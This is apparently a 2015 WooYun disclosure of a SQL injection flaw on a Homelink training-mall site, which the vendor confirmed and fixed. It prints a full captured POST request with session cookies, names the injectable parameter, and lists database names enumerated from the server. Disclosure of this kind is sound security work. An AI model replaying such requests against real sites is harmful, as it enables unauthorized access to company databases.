当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0124889

漏洞标题:北京链家房地产经纪有限公司某站SQL注入漏洞

相关厂商:homelink.com.cn

漏洞作者: 路人甲

提交时间:2015-07-06 14:46

修复时间:2015-08-22 11:34

公开时间:2015-08-22 11:34

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:18

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-06: 细节已通知厂商并且等待厂商处理中
2015-07-08: 厂商已经确认,细节仅向厂商公开
2015-07-18: 细节向核心白帽子及相关领域专家公开
2015-07-28: 细节向普通白帽子公开
2015-08-07: 细节向实习白帽子公开
2015-08-22: 细节向公众公开

简要描述:

北京链家房地产经纪有限公司某站SQL注入漏洞

详细说明:


POST /Shopmall/SMProducts01Detail01.aspx HTTP/1.1
Host: tc.homelink.com.cn
Proxy-Connection: keep-alive
Content-Length: 7364
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://tc.homelink.com.cn
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/43.0.2357.65 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://tc.homelink.com.cn/Shopmall/SMProducts01Detail01.aspx
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: __mta=47046040.1435906039062.1435906039062.1435906114386.2; CNZZDATA1000214474=1343607009-1435906021-http%253A%252F%252Ftc.homelink.com.cn%252F%7C1435906021; __guid=84235164.2287621405384210700.1435914131891.7515; ASP.NET_SessionId=ctmrbkhp4o1r4xgh1z3rxj2h
__EVENTTARGET=&__EVENTARGUMENT=&__LASTFOCUS=&__VIEWSTATE=%2FwEPDwUJMzUxODQwNTcwD2QWAmYPZBYCAgMPZBYIAgEPZBYCAgEPZBYKAgMPDxYCHgRUZXh0BRjln7norq3kuK3lv4PkvZzkuJrns7vnu59kZAIFDw8WAh8ABR7ns7vnu5%2FnrqHnkIblkZggKOWfueiureS4reW%2FgylkZAIJDw8WAh4LTmF2aWdhdGVVcmwFGn4vU2hvcG1hbGwvU2hvcG1hbGwwMS5hc3B4ZGQCDQ8PFgIfAQUefi9TeXN0ZW1zL0NoYW5nUGFzc3dvcmQwMS5hc3B4ZGQCEQ8PFgIfAQUoaHR0cDovL3RjLmhvbWVsaW5rLmNvbS5jbi9oZWxwL2hlbHAuaHRtbGRkAgMPZBYCAgEPZBYCZg9kFgQCAQ8QDxYGHg1EYXRhVGV4dEZpZWxkBQ1TZWNTeXN0ZW1EZXNjHg5EYXRhVmFsdWVGaWVsZAULU2VjU3lzdGVtTm8eC18hRGF0YUJvdW5kZ2QQFQkV6K%2B36YCJ5oup5L2c5Lia57O757ufD0tNIOeuoeeQhuezu%2Be7nxvmkI%2FlrabkuonpnLjotZvkvZzkuJrns7vnu58h6LaF57qn57uP57qq5Lq65aSn6LWb5L2c5Lia57O757ufGOmTvuWutuWtpumZouS9nOS4muezu%2Be7nx7ln7norq3kuK3lv4PllYblnLrnrqHnkIbns7vnu58S57O757uf5Y%2BC5pWw6K6%2B5a6aIeezu%2Be7n%2BWKn%2BiDvSAvIOS9v%2BeUqOadg%2BmZkOiuvuWumhjlrabkuaDmmajkvJrkvZzkuJrns7vnu58VCQEwAktNB0VydWRpdGUKU3VwZXJhZ2VudAdBY2FkZW15CFNob3BtYWxsBUJhc2lzB1N5c3RlbXMEUXVpehQrAwlnZ2dnZ2dnZ2cWAWZkAgMPDxYCHwAFHuWfueiureS4reW%2Fg%2BWVhuWcuueuoeeQhuezu%2Be7n2RkAgUPZBYCAgEPZBYCAgEPPCsAEQIADxYEHwRnHgtfIUl0ZW1Db3VudAIKZAEQFgAWABYAFgJmD2QWGGYPDxYCHgdWaXNpYmxlaGRkAgEPD2QWBB4Lb25tb3VzZW92ZXIFZmN1cnJlbnRjb2xvcj10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0NBREMzQScsdGhpcy5zdHlsZS5mb250V2VpZ2h0PScnOx4Kb25tb3VzZW91dAVBdGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9Y3VycmVudGNvbG9yLHRoaXMuc3R5bGUuZm9udFdlaWdodD0nJzsWBGYPZBYEAgEPDxYCHwAFATBkZAIDDw8WAh4ISW1hZ2VVcmwFD34vSW1hZ2VzLzQ4LnBuZ2RkAgEPZBYEAgEPDxYCHwAFH1Nob3BtYWxsL0RlZmF1bHRTaG9wbWFsbDAxLmFzcHhkZAIDDw8WBB8BZB8ABQzorr7lrprkvZzkuJpkZAICDw9kFgQfBwVmY3VycmVudGNvbG9yPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjQ0FEQzNBJyx0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7HwgFQXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWN1cnJlbnRjb2xvcix0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7FgRmD2QWBAIBDw8WAh8ABQExZGQCAw8PFgIfCQUTfi9JbWFnZXMvc3BhY2VyLmdpZmRkAgEPZBYEAgEPDxYCHwAFIVNob3BtYWxsL1Byb2RTdGF0dXNTZXR0aW5nMDEuYXNweGRkAgMPDxYEHwEFIVNob3BtYWxsL1Byb2RTdGF0dXNTZXR0aW5nMDEuYXNweB8ABRLllYblk4HnirbmgIHorr7lrppkZAIDDw9kFgQfBwVmY3VycmVudGNvbG9yPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjQ0FEQzNBJyx0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7HwgFQXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWN1cnJlbnRjb2xvcix0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7FgRmD2QWBAIBDw8WAh8ABQEyZGQCAw8PFgIfCQUTfi9JbWFnZXMvc3BhY2VyLmdpZmRkAgEPZBYEAgEPDxYCHwAFI1Nob3BtYWxsL1Byb2RDYXRlZ29yeVNldHRpbmcwMS5hc3B4ZGQCAw8PFgQfAQUjU2hvcG1hbGwvUHJvZENhdGVnb3J5U2V0dGluZzAxLmFzcHgfAAUS5ZWG5ZOB57G75Z6L6K6%2B5a6aZGQCBA8PZBYEHwcFZmN1cnJlbnRjb2xvcj10aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcjt0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj0nI0NBREMzQScsdGhpcy5zdHlsZS5mb250V2VpZ2h0PScnOx8IBUF0aGlzLnN0eWxlLmJhY2tncm91bmRDb2xvcj1jdXJyZW50Y29sb3IsdGhpcy5zdHlsZS5mb250V2VpZ2h0PScnOxYEZg9kFgQCAQ8PFgIfAAUBM2RkAgMPDxYCHwkFE34vSW1hZ2VzL3NwYWNlci5naWZkZAIBD2QWBAIBDw8WAh8ABSVTaG9wbWFsbC9Qcm9kUHJpY2VBcHBseVNldHRpbmcwMS5hc3B4ZGQCAw8PFgQfAQUlU2hvcG1hbGwvUHJvZFByaWNlQXBwbHlTZXR0aW5nMDEuYXNweB8ABRLpgILnlKjlr7nosaHorr7lrppkZAIFDw9kFgQfBwVmY3VycmVudGNvbG9yPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjQ0FEQzNBJyx0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7HwgFQXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWN1cnJlbnRjb2xvcix0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7FgRmD2QWBAIBDw8WAh8ABQEwZGQCAw8PFgIfCQUPfi9JbWFnZXMvNDgucG5nZGQCAQ9kFgQCAQ8PFgIfAAUfU2hvcG1hbGwvRGVmYXVsdFNob3BtYWxsMDEuYXNweGRkAgMPDxYEHwFkHwAFDOe7tOaKpOS9nOS4mmRkAgYPD2QWBB8HBWZjdXJyZW50Y29sb3I9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNDQURDM0EnLHRoaXMuc3R5bGUuZm9udFdlaWdodD0nJzsfCAVBdGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9Y3VycmVudGNvbG9yLHRoaXMuc3R5bGUuZm9udFdlaWdodD0nJzsWBGYPZBYEAgEPDxYCHwAFATFkZAIDDw8WAh8JBRN%2BL0ltYWdlcy9zcGFjZXIuZ2lmZGQCAQ9kFgQCAQ8PFgIfAAUaU2hvcG1hbGwvU01Qcm9kdWN0czAxLmFzcHhkZAIDDw8WBB8BBRpTaG9wbWFsbC9TTVByb2R1Y3RzMDEuYXNweB8ABQzllYblk4HnrqHnkIZkZAIHDw9kFgQfBwVmY3VycmVudGNvbG9yPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjQ0FEQzNBJyx0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7HwgFQXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWN1cnJlbnRjb2xvcix0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7FgRmD2QWBAIBDw8WAh8ABQEyZGQCAw8PFgIfCQUTfi9JbWFnZXMvc3BhY2VyLmdpZmRkAgEPZBYEAgEPDxYCHwAFGFNob3BtYWxsL1NNUmVhZGVyMDEuYXNweGRkAgMPDxYEHwEFGFNob3BtYWxsL1NNUmVhZGVyMDEuYXNweB8ABQ%2FpmIXor7vogIXnu7TmiqRkZAIIDw9kFgQfBwVmY3VycmVudGNvbG9yPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjQ0FEQzNBJyx0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7HwgFQXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWN1cnJlbnRjb2xvcix0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7FgRmD2QWBAIBDw8WAh8ABQEwZGQCAw8PFgIfCQUPfi9JbWFnZXMvNDgucG5nZGQCAQ9kFgQCAQ8PFgIfAAUfU2hvcG1hbGwvRGVmYXVsdFNob3BtYWxsMDEuYXNweGRkAgMPDxYEHwFkHwAFDOWIhuaekOS9nOS4mmRkAgkPD2QWBB8HBWZjdXJyZW50Y29sb3I9dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I7dGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9JyNDQURDM0EnLHRoaXMuc3R5bGUuZm9udFdlaWdodD0nJzsfCAVBdGhpcy5zdHlsZS5iYWNrZ3JvdW5kQ29sb3I9Y3VycmVudGNvbG9yLHRoaXMuc3R5bGUuZm9udFdlaWdodD0nJzsWBGYPZBYEAgEPDxYCHwAFATFkZAIDDw8WAh8JBRN%2BL0ltYWdlcy9zcGFjZXIuZ2lmZGQCAQ9kFgQCAQ8PFgIfAAUaU2hvcG1hbGwvU01JbnZvaWNlczAxLmFzcHhkZAIDDw8WBB8BBRpTaG9wbWFsbC9TTUludm9pY2VzMDEuYXNweB8ABQzlj5HnpajnrqHnkIZkZAIKDw9kFgQfBwVmY3VycmVudGNvbG9yPXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yO3RoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPScjQ0FEQzNBJyx0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7HwgFQXRoaXMuc3R5bGUuYmFja2dyb3VuZENvbG9yPWN1cnJlbnRjb2xvcix0aGlzLnN0eWxlLmZvbnRXZWlnaHQ9Jyc7FgRmD2QWBAIBDw8WAh8ABQEwZGQCAw8PFgIfCQUPfi9JbWFnZXMvNDgucG5nZGQCAQ9kFgQCAQ8PFgIfAAUfU2hvcG1hbGwvRGVmYXVsdFNob3BtYWxsMDEuYXNweGRkAgMPDxYEHwFkHwAFEuS%2FoeaBr%2Baxh%2BWFpeS9nOS4mmRkAgsPDxYCHwZoZGQCCQ9kFgICAQ9kFjYCAQ8PFgIfAAU25ZWG5ZOB566h55CGID4gPGZvbnQgY29sb3I9IkJsdWUiPiDkv67mlLnotYTmlpk8L2ZvbnQ%2BZGQCDQ8PFgIfBmhkZAITDw8WBB8ABQN0ZXQfBmhkZAIVDw8WBB8ABQN0ZXQfBmdkZAIXDw8WAh8ABQIyNmRkAhsPDxYCHwZnZGQCIQ8PFgIfBmdkZAIjDw8WBB8ABQMxMjMfBmhkZAInDw8WAh8GaGRkAi0PEA8WCB8CBQlaRmllbGRDMDEfAwUGWktleTAyHwRnHwZnZBAVBhXor7fpgInmi6nllYblk4HnsbvlnosJ5Z%2B56K6t57G7FOWfueiurSjlkKvor77ku7Yp57G7CeivvuS7tuexuwnop4bpopHnsbsJ5pyN5Yqh57G7FQYBMAIxMAIxMgIyMAIzMAI0MBQrAwZnZ2dnZ2cWAQIDZAIvDw8WAh8ABQIyMGRkAjEPDxYCHwAFAVlkZAIzDw8WBB8ABQnor77ku7bnsbsfBmhkZAI3Dw8WAh8GZ2RkAj0PDxYCHwZnZGQCPw8PFgQfAAUEdGVzdB8GaGRkAkMPDxYCHwZnZGQCSQ8PFgIfBmdkZAJLDw8WBB8ABQd0ZXRzdHR0HwZoZGQCTw8PFgIfBmdkZAJVDw8WAh8GZ2RkAlcPDxYEHwAFBHRlc3QfBmhkZAJbDw8WAh8GZ2RkAmEPEA8WCB8CBQlaRmllbGRDMDEfAwUGWktleTAyHwRnHwZnZBAVAgbkuIrmnrYG5LiL5p62FQIBMQEyFCsDAmdnZGQCYw8PFgIfAAUBMmRkAmUPDxYEHwAFATIfBmhkZAJtDw8WBB8ABQbmj5DkuqQfBmdkZBgCBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUgY3RsMDAkVUNVSEREZWZhdWx0MSRJbWFnZUJ1dHRvbjIFI2N0bDAwJFVDRnVuY3Rpb25zMSRHcmlkVmlld1VzZXJQcm9nDzwrAAwBCAIBZBYLAAQHKuqj%2B6Z2xRy2Td1L4bpNBWu0FQFiHeoPv0Q6&__EVENTVALIDATION=%2FwEWHQKcn8mfDQLu7fqtCQL%2Bup28DQLu1bfSAQKb1avMAQKMwrqAAwKE87n7AQKMmf%2BBCQKf3%2FmcCgLSr4jqAwLy4eupCgLCrtTaDwKThL%2BuAgKd5OtEAqzG8PoMAryp2hQCo6maFwKjqZIXAqKpmhcCoamaFwKgqZoXAoa%2FpLYDAvjjvykC%2BOP7JwK67b%2BpCwK77b%2BpCwK1gpXHBwKG1qD0CQKokaLfCqXiRPR6%2F5RjkvbNxf5mESj5SBttSCDc7EhfYa4uooun&ctl00%24UCSystemTitle1%24DDLSystems=0&ctl00%24ContentPlaceHolder1%24txtProdRefNo=123&ctl00%24ContentPlaceHolder1%24DDLProdCategory=20&ctl00%24ContentPlaceHolder1%24txtProdName=test&ctl00%24ContentPlaceHolder1%24txtProdDescS=tetsttt&ctl00%24ContentPlaceHolder1%24txtProdDesc=test&ctl00%24ContentPlaceHolder1%24RBLProdStatus=2&ctl00%24ContentPlaceHolder1%24btnSave=%E6%8F%90%E4%BA%A4
注入参数
'ctl00$ContentPlaceHolder1$txtProdRefNo'

漏洞证明:

t2.png


t3.png



列出简单几个表结构
msdb
ReportServer
ReportServerTempDB
tempdb
TrainingCenter
。。。。。。。

修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2015-07-08 11:33

厂商回复:

确认

最新状态:

2015-07-15:已经修复


漏洞评价:

评论